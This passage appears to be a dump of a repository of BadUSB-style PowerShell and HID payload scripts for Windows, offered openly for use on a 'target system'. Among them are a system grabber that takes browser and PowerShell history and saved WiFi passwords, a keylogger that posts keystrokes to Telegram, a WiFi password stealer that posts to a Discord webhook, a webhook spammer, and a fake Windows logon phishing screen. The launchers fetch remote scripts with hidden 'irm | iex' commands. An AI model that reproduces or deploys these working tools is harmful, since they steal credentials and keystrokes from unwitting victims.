Win32_UserAccount 31 | $videocardinfo = Get-WmiObject Win32_VideoController 32 | $Hddinfo = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, FileSystem,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,FileSystem,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } ;$Hddinfo=($Hddinfo| 
Out-String) ;$Hddinfo = ("$Hddinfo").TrimEnd("") 33 | $RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} 34 | $users = "$($userInfo.Name)" 35 | $userString = "`nFull Name : $($userInfo.FullName)" 36 | $OSString = "$($systemInfo.Caption) $($systemInfo.OSArchitecture)" 37 | $systemString = "Processor : $($processorInfo.Name)" 38 | $systemString += "`nMemory : $RamInfo" 39 | $systemString += "`nGpu : $($videocardinfo.Name)" 40 | $systemString += "`nStorage : $Hddinfo" 41 | $COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table 42 | $process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine 43 | $service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'} 44 | $software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize 45 | $drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion 46 | $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" 47 | $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique 48 | $Value | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} 49 | $Regex2 = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Pathed = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History" 50 | $Value2 = Get-Content 
-Path $Pathed | Select-String -AllMatches $regex2 |% {($_.Matches).Value} |Sort -Unique 51 | $Value2 | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}} 52 | $pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt";$pshistory = Get-Content $pshist -raw 53 | $FilePath = "$env:temp\systeminfo.txt" 54 | $outssid="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){ 55 | if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()} 56 | $pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$outssid+="SSID: $ssid : Password: $pass`n"}}}$a++;} 57 | $RecentFiles = Get-ChildItem -Path $env:USERPROFILE -Recurse -File | Sort-Object LastWriteTime -Descending | Select-Object -First 100 FullName, LastWriteTime 58 | $contents = "======================================================== 59 | 60 | Current User : $env:USERNAME 61 | Email Address : $email 62 | Language : $systemLanguage 63 | Keyboard Layout : $keyboardLayoutID 64 | Other Accounts : $users 65 | Public IP : $computerPubIP 66 | Current OS : $OSString 67 | Build : $ver 68 | Hardware Info 69 | -------------------------------------------------------- 70 | $systemString" 71 | "--------------------- SYSTEM INFORMATION for $env:COMPUTERNAME -----------------------`n" | Out-File -FilePath $FilePath -Encoding ASCII 72 | "General Info `n $contents" | Out-File -FilePath $FilePath -Encoding ASCII -Append 73 | "Network Info `n -----------------------------------------------------------------------`n$outssid" | Out-File -FilePath $FilePath -Encoding ASCII -Append 74 | "USB Info `n 
-----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 75 | ($COMDevices| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 76 | "`n" | Out-File -FilePath $FilePath -Encoding ASCII -Append 77 | "SOFTWARE INFO `n ======================================================================" | Out-File -FilePath $FilePath -Encoding ASCII -Append 78 | "Installed Software `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 79 | ($software| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 80 | "Processes `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 81 | ($process| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 82 | "Services `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 83 | ($service| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 84 | "Drivers `n -----------------------------------------------------------------------`n$drivers" | Out-File -FilePath $FilePath -Encoding ASCII -Append 85 | "`n" | Out-File -FilePath $FilePath -Encoding ASCII -Append 86 | "HISTORY INFO `n ====================================================================== `n" | Out-File -FilePath $FilePath -Encoding ASCII -Append 87 | "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 88 | ($Value| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 89 | ($Value2| Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 90 | "Powershell History `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 91 | ($pshistory| 
Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 92 | "Recent Files `n -----------------------------------------------------------------------" | Out-File -FilePath $FilePath -Encoding ASCII -Append 93 | ($RecentFiles | Out-String) | Out-File -FilePath $FilePath -Encoding ASCII -Append 94 | Post-Message 95 | Post-File ;rm -Path $FilePath -Force 96 | -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Keylogger/Keylogger-to-Telegram.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Keyloggger to Telegram Chat. 2 | // Author: @beigeworm 3 | // Description: This script logs all Keystrokes and posts results to a Telegram chat when the keyboard goes inactive for more than 10 secs. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace TOKEN_HERE with your Telegram token. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $tg='TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Telegram-Keylogger/main.ps1 | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Keylogger/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Keylogger To Telegram Chat

3 | 4 | SYNOPSIS 5 | 6 | This script connects target computer with a telegram chat to capture keystrokes. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 5. Run Script on target System 14 | -------------------------------------------------------------------------------- /Fast-Execution/Telegram-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | $Token = "$tg" 2 | $PassPhrase = "$env:COMPUTERNAME" 3 | $URL='https://api.telegram.org/bot{0}' -f $Token 4 | while($chatID.length -eq 0){ 5 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 6 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 7 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 8 | Sleep 10 9 | } 10 | 11 | Function KeyCapture { 12 | $MessageToSend = New-Object psobject 13 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID 14 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : KeyCapture Started." 
-Force 15 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 16 | $API = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int GetKeyboardState(byte[] keystate);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int MapVirtualKey(uint uCode, int uMapType);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);' 17 | $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru 18 | $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() 19 | $KeypressThreshold = [TimeSpan]::FromSeconds(10) 20 | While ($true){ 21 | $keyPressed = $false 22 | try{ 23 | while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { 24 | Start-Sleep -Milliseconds 30 25 | for ($asc = 8; $asc -le 254; $asc++){ 26 | $keyst = $API::GetAsyncKeyState($asc) 27 | if ($keyst -eq -32767) { 28 | $keyPressed = $true 29 | $LastKeypressTime.Restart() 30 | $null = [console]::CapsLock 31 | $vtkey = $API::MapVirtualKey($asc, 3) 32 | $kbst = New-Object Byte[] 256 33 | $checkkbst = $API::GetKeyboardState($kbst) 34 | $logchar = New-Object -TypeName System.Text.StringBuilder 35 | if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { 36 | $LString = $logchar.ToString() 37 | if ($asc -eq 8) {$LString = "[BKSP]"} 38 | if ($asc -eq 13) {$LString = "[ENT]"} 39 | if ($asc -eq 27) {$LString = "[ESC]"} 40 | $nosave += $LString 41 | }}}}} 42 | finally{ 43 | If ($keyPressed) { 44 | $escmsgsys = $nosave -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 45 | $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" 46 | $escmsg = "Keys Captured : "+$escmsgsys 47 | 
$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$escmsg" -Force 48 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 49 | $keyPressed = $false 50 | $nosave = "" 51 | } 52 | } 53 | $LastKeypressTime.Restart() 54 | Start-Sleep -Milliseconds 10 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /Fast-Execution/US-Keyboard-Layout/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Set US Keyboard Layout

3 | 4 | SYNOPSIS 5 | 6 | This script changes the keyboard layout and system language to US. 7 | 8 | USAGE 9 | 10 | 1. Run the script on a target system -------------------------------------------------------------------------------- /Fast-Execution/US-Keyboard-Layout/US-Keyboard.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Keyboard Language changer. 2 | // Author: @beigeworm 3 | // Description: This script changes the keyboard layout and system language to US. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/US-Keyboard-Layout/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/US-Keyboard-Layout/main.ps1: -------------------------------------------------------------------------------- 1 | Function SetkbUS { 2 | 3 | Dism /online /Get-Intl 4 | Set-WinSystemLocale en-US 5 | Set-WinUserLanguageList en-US -force 6 | 7 | } 8 | 9 | SetkbUS 10 | -------------------------------------------------------------------------------- /Fast-Execution/Wallpaper-Jumpscare/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Wallpaper Changer

3 | 4 | SYNOPSIS 5 | 6 | This script will download an image from the web and set it as the wallpaper. 7 | 8 | USAGE 9 | 10 | 1. Change DIRECT IMAGE LINK HERE to your URL. 11 | 2. Run the script. 12 | -------------------------------------------------------------------------------- /Fast-Execution/Wallpaper-Jumpscare/Wallpaper-Jumpscare.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Wallpaper Jump Scare. 2 | // Author: @beigeworm 3 | // Description: This script downloads a scary image and sets it as a wallpaper. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Wallpaper-Jumpscare/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Wallpaper-Jumpscare/main.ps1: -------------------------------------------------------------------------------- 1 | $url = "https://i.ibb.co/XJSPt9s/1.png" 2 | $outputPath = "$env:temp\img.jpg" 3 | $wallpaperStyle = 2 # 0: Tiled, 1: Centered, 2: Stretched 4 | 5 | IWR -Uri $url -OutFile $outputPath 6 | 7 | $signature = @' 8 | using System; 9 | using System.Runtime.InteropServices; 10 | 11 | public class Wallpaper { 12 | [DllImport("user32.dll", CharSet = CharSet.Auto)] 13 | public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); 14 | } 15 | '@ 16 | 17 | Add-Type -TypeDefinition $signature 18 | 19 | $SPI_SETDESKWALLPAPER = 0x0014 20 | $SPIF_UPDATEINIFILE = 0x01 21 | $SPIF_SENDCHANGE = 0x02 22 | 23 | [Wallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $outputPath, $SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE) 24 | 
-------------------------------------------------------------------------------- /Fast-Execution/Webhook-Spammer-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Discord Spammer With GUI

3 | 4 | SYNOPSIS 5 | 6 | Creates a GUI with functionality to spam a webhook with text or an image. 7 | 8 | USAGE 9 | 10 | 1. Run script with powershell 11 | 2. Input ip Range and select additional parameters 12 | 3. Press "Start Scan" 13 | -------------------------------------------------------------------------------- /Fast-Execution/Webhook-Spammer-GUI/Webhook-Spammer-GUI.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Webhook Spammer GUI Tool. 2 | // Author: @beigeworm 3 | // Description: This script creates a GUI for Spamming a webhook with text or an image. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Webhook-Spammer-GUI/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/Webhook-Spammer-GUI/main.ps1: -------------------------------------------------------------------------------- 1 | Add-Type -AssemblyName System.Windows.Forms 2 | Add-Type -AssemblyName System.Drawing 3 | Add-Type -AssemblyName Microsoft.VisualBasic 4 | [System.Windows.Forms.Application]::EnableVisualStyles() 5 | 6 | $tooltip1 = New-Object System.Windows.Forms.ToolTip 7 | $ShowHelp={ 8 | Switch ($this.name) { 9 | 10 | 11 | "start" {$tip = "Start Spamming!"} 12 | 13 | "image" {$tip = "Select an Image"} 14 | 15 | "url" {$tip = "Input Discord Webhook URL"} 16 | 17 | "message" {$tip = "Input Message Here"} 18 | 19 | "imgpath" {$tip = "Path to your Image"} 20 | 21 | "delay" {$tip = "Delay Between Sending"} 22 | 23 | "amount" {$tip = "Amount of Messages to Send"} 24 | } 25 | $tooltip1.SetToolTip($this,$tip) 26 | } 27 | 28 | $MainWindow = New-Object System.Windows.Forms.Form 29 | 
$MainWindow.ClientSize = '435,300' 30 | $MainWindow.Text = "| BeigeTools | Webhook Spammer |" 31 | $MainWindow.BackColor = "#242424" 32 | $MainWindow.Opacity = 1 33 | $MainWindow.TopMost = $true 34 | $MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DevicePairingWizard.exe") 35 | 36 | $StartSpam = New-Object System.Windows.Forms.Button 37 | $StartSpam.Text = "Start" 38 | $StartSpam.Width = 80 39 | $StartSpam.Height = 25 40 | $StartSpam.Location = New-Object System.Drawing.Point(340, 263) 41 | $StartSpam.Font = 'Microsoft Sans Serif,8,style=Bold' 42 | $StartSpam.BackColor = "#eeeeee" 43 | $StartSpam.add_MouseHover($showhelp) 44 | $StartSpam.name="start" 45 | 46 | $selimage = New-Object System.Windows.Forms.Button 47 | $selimage.Text = "Browse" 48 | $selimage.Width = 80 49 | $selimage.Height = 25 50 | $selimage.Location = New-Object System.Drawing.Point(245, 263) 51 | $selimage.Font = 'Microsoft Sans Serif,8,style=Bold' 52 | $selimage.BackColor = "#eeeeee" 53 | $selimage.add_MouseHover($showhelp) 54 | $selimage.name="image" 55 | 56 | $URLboxInputHeader = New-Object System.Windows.Forms.Label 57 | $URLboxInputHeader.Text = "Discord Webhook URL" 58 | $URLboxInputHeader.ForeColor = "#bcbcbc" 59 | $URLboxInputHeader.AutoSize = $true 60 | $URLboxInputHeader.Width = 25 61 | $URLboxInputHeader.Height = 10 62 | $URLboxInputHeader.Location = New-Object System.Drawing.Point(15, 15) 63 | $URLboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 64 | 65 | $URLboxInput = New-Object System.Windows.Forms.TextBox 66 | $URLboxInput.Location = New-Object System.Drawing.Point(20, 35) 67 | $URLboxInput.BackColor = "#eeeeee" 68 | $URLboxInput.Width = 400 69 | $URLboxInput.Height = 40 70 | $URLboxInput.Text = "https://discord.com/api/webhooks/..." 
71 | $URLboxInput.Multiline = $false 72 | $URLboxInput.Font = 'Microsoft Sans Serif,8,style=Bold' 73 | $URLboxInput.add_MouseHover($showhelp) 74 | $URLboxInput.name="url" 75 | 76 | $TextboxInputHeader = New-Object System.Windows.Forms.Label 77 | $TextboxInputHeader.Text = "Message Content" 78 | $TextboxInputHeader.ForeColor = "#bcbcbc" 79 | $TextboxInputHeader.AutoSize = $true 80 | $TextboxInputHeader.Width = 25 81 | $TextboxInputHeader.Height = 10 82 | $TextboxInputHeader.Location = New-Object System.Drawing.Point(15, 63) 83 | $TextboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 84 | 85 | $TextBoxInput = New-Object System.Windows.Forms.TextBox 86 | $TextBoxInput.Location = New-Object System.Drawing.Point(20, 83) 87 | $TextBoxInput.BackColor = "#eeeeee" 88 | $TextBoxInput.Width = 400 89 | $TextBoxInput.Height = 110 90 | $TextBoxInput.Text = "" 91 | $TextBoxInput.Multiline = $true 92 | $TextBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold' 93 | $TextBoxInput.add_MouseHover($showhelp) 94 | $TextBoxInput.name="message" 95 | 96 | $ImageInputHeader = New-Object System.Windows.Forms.Label 97 | $ImageInputHeader.Text = "Image Path" 98 | $ImageInputHeader.ForeColor = "#bcbcbc" 99 | $ImageInputHeader.AutoSize = $true 100 | $ImageInputHeader.Width = 25 101 | $ImageInputHeader.Height = 10 102 | $ImageInputHeader.Location = New-Object System.Drawing.Point(15, 200) 103 | $ImageInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 104 | 105 | $ImageInput = New-Object System.Windows.Forms.TextBox 106 | $ImageInput.Location = New-Object System.Drawing.Point(20, 220) 107 | $ImageInput.BackColor = "#eeeeee" 108 | $ImageInput.Width = 400 109 | $ImageInput.Height = 20 110 | $ImageInput.Text = "" 111 | $ImageInput.Multiline = $true 112 | $ImageInput.Font = 'Microsoft Sans Serif,8,style=Bold' 113 | $ImageInput.add_MouseHover($showhelp) 114 | $ImageInput.name="imgpath" 115 | 116 | $coolboxInputHeader = New-Object System.Windows.Forms.Label 117 | $coolboxInputHeader.Text = 
"Cooldown" 118 | $coolboxInputHeader.ForeColor = "#bcbcbc" 119 | $coolboxInputHeader.AutoSize = $true 120 | $coolboxInputHeader.Width = 25 121 | $coolboxInputHeader.Height = 10 122 | $coolboxInputHeader.Location = New-Object System.Drawing.Point(115, 245) 123 | $coolboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 124 | 125 | $coolboxInput = New-Object System.Windows.Forms.TextBox 126 | $coolboxInput.Location = New-Object System.Drawing.Point(120, 265) 127 | $coolboxInput.BackColor = "#eeeeee" 128 | $coolboxInput.Width = 60 129 | $coolboxInput.Height = 40 130 | $coolboxInput.Text = "700" 131 | $coolboxInput.Multiline = $false 132 | $coolboxInput.Font = 'Microsoft Sans Serif,8,style=Bold' 133 | $coolboxInput.add_MouseHover($showhelp) 134 | $coolboxInput.name="delay" 135 | 136 | $amtboxInputHeader = New-Object System.Windows.Forms.Label 137 | $amtboxInputHeader.Text = "Amount" 138 | $amtboxInputHeader.ForeColor = "#bcbcbc" 139 | $amtboxInputHeader.AutoSize = $true 140 | $amtboxInputHeader.Width = 25 141 | $amtboxInputHeader.Height = 10 142 | $amtboxInputHeader.Location = New-Object System.Drawing.Point(15, 245) 143 | $amtboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 144 | 145 | $amtBoxInput = New-Object System.Windows.Forms.TextBox 146 | $amtBoxInput.Location = New-Object System.Drawing.Point(20, 265) 147 | $amtBoxInput.BackColor = "#eeeeee" 148 | $amtBoxInput.Width = 60 149 | $amtBoxInput.Height = 40 150 | $amtBoxInput.Text = "100" 151 | $amtBoxInput.Multiline = $false 152 | $amtBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold' 153 | $amtBoxInput.add_MouseHover($showhelp) 154 | $amtBoxInput.name="amount" 155 | 156 | $mstext = New-Object System.Windows.Forms.Label 157 | $mstext.Text = "ms" 158 | $mstext.ForeColor = "#bcbcbc" 159 | $mstext.AutoSize = $true 160 | $mstext.Width = 25 161 | $mstext.Height = 10 162 | $mstext.Location = New-Object System.Drawing.Point(185, 268) 163 | $mstext.Font = 'Microsoft Sans Serif,8,style=Bold' 164 | 165 | 
#==================================================== Define GUI Elements ========================================================== 166 | 167 | $MainWindow.controls.AddRange(@($StartSpam, $ImageInput, $ImageInputHeader, $selimage, $URLBoxInput, $URLBoxInputHeader, $TextBoxInput, $coolboxInput, $amtBoxInput, $TextboxInputHeader, $coolboxInputHeader, $amtboxInputHeader, $mstext)) 168 | 169 | #==================================================== Click Functions ========================================================== 170 | 171 | $StartSpam.Add_Click({ 172 | 173 | $hookurl = $URLBoxInput.Text 174 | $n = [int]$amtBoxInput.Text 175 | $c = [int]$coolBoxInput.Text 176 | $i = 0 177 | 178 | while($i -lt $n) { 179 | $msgsys = $TextboxInput.Text 180 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 181 | $jsonsys = @{"username" = "Spammer" ;"content" = $escmsgsys} | ConvertTo-Json 182 | Start-Sleep -Milliseconds $c 183 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 184 | $i++ 185 | } 186 | 187 | $imageBytes = [System.IO.File]::ReadAllBytes($ImageInput.Text) 188 | $b64 = [System.Convert]::ToBase64String($imageBytes) 189 | $decodedFile = [System.Convert]::FromBase64String($b64) 190 | $File = "$env:temp\bl.png" 191 | Set-Content -Path $File -Value $decodedFile -Encoding Byte 192 | 193 | while($i -lt $n) { 194 | curl.exe -F "file1=@$file" $hookurl 195 | $i++ 196 | } 197 | 198 | Remove-Item -Path $file -Force 199 | }) 200 | 201 | 202 | $selimage.Add_Click({ 203 | 204 | $FileDialog = New-Object Windows.Forms.OpenFileDialog 205 | $FileDialog.Filter = "All Files (*.*)|*.*" 206 | 207 | if ($FileDialog.ShowDialog() -eq [Windows.Forms.DialogResult]::OK) { 208 | $SelectedFilePath = $FileDialog.FileName 209 | $ImageInput.Text = $SelectedFilePath 210 | } 211 | 212 | }) 213 | 214 | $MainWindow.ShowDialog() | Out-Null 215 | exit 216 | 
-------------------------------------------------------------------------------- /Fast-Execution/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's saved WiFi to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script collects saved WiFi info and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_wifi_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Wifi-Networks-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Saved Wifi Networks to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers WiFi information and posts to a discord webhook address with the results. 7 | 8 | USAGE 9 | 10 | 1. Input your credentials below 11 | 2. Run Script on target System 12 | 3. Check Discord for results 13 | 14 | -------------------------------------------------------------------------------- /Fast-Execution/Wifi-Networks-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | $outfile="" 3 | $a=0 4 | $ws=(netsh wlan show profiles) -replace ".*:\s+" 5 | foreach($s in $ws){ 6 | if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ 7 | $ssid=$s.Trim() 8 | if($s -Match ":"){ 9 | $ssid=$s.Split(":")[1].Trim() 10 | } 11 | $pw=(netsh wlan show profiles name=$ssid key=clear) 12 | $pass="None" 13 | foreach($p in $pw){ 14 | if($p -Match "Key Content"){ 15 | $pass=$p.Split(":")[1].Trim() 16 | $outfile+="SSID: $ssid : Password: $pass`n" 17 | } 18 | } 19 | } 20 | $a++ 21 | } 22 | 23 | $outfile | Out-File -FilePath "$env:temp\info.txt" -Encoding ASCII -Append 24 | 25 | $Pathsys = "$env:temp\info.txt" 26 | $msgsys = Get-Content -Path $Pathsys -Raw 27 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 28 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 29 | Start-Sleep 1 30 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 31 | Remove-Item -Path $Pathsys -force 32 | -------------------------------------------------------------------------------- /Fast-Execution/Win10-Phishing/Fake-Windows-10-Logon.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Fake Windows Logon Screen to Discord Webhook. 
2 | // Author: @beigeworm 3 | // Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_win10_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Win10-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Fake Windows Logon Screen to Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 8 | 9 | USAGE 10 | 11 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook. 12 | 2. Run script on target system. 13 | -------------------------------------------------------------------------------- /Fast-Execution/Win10-Phishing/main.ps1: -------------------------------------------------------------------------------- 1 | # GATHER SYSTEM AND USER INFO 2 | $u = (Get-WmiObject Win32_UserAccount -Filter "Name = '$Env:UserName'").FullName 3 | $c = $env:COMPUTERNAME 4 | $wpURL = "https://wallpapercave.com/wp/wp1809099.jpg" 5 | 6 | # DEFAULT LOGIN METHOD 7 | $value = Get-ItemPropertyValue -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\NgcPin" -Name "DeviceLockEnforcementPending" -ErrorAction SilentlyContinue 8 | if ($value -eq 0 -or $value -eq 1) {$mthd = "PIN"} else {$mthd = "Password"} 9 | 10 | # FIND ACCOUNT PICTURES 11 | $accountPicturesPath = "C:\ProgramData\Microsoft\Default Account Pictures" 12 | $imageFiles = Get-ChildItem -Path $accountPicturesPath -include "*.jpg", "*.png", "*.bmp" -File -Recurse 13 | if ($imageFiles.Count -gt 0) { 14 | $firstImage = $imageFiles[0].FullName 15 | $image = [System.Drawing.Image]::FromFile($firstImage) 16 | $usrimg = "$image" 17 | }else 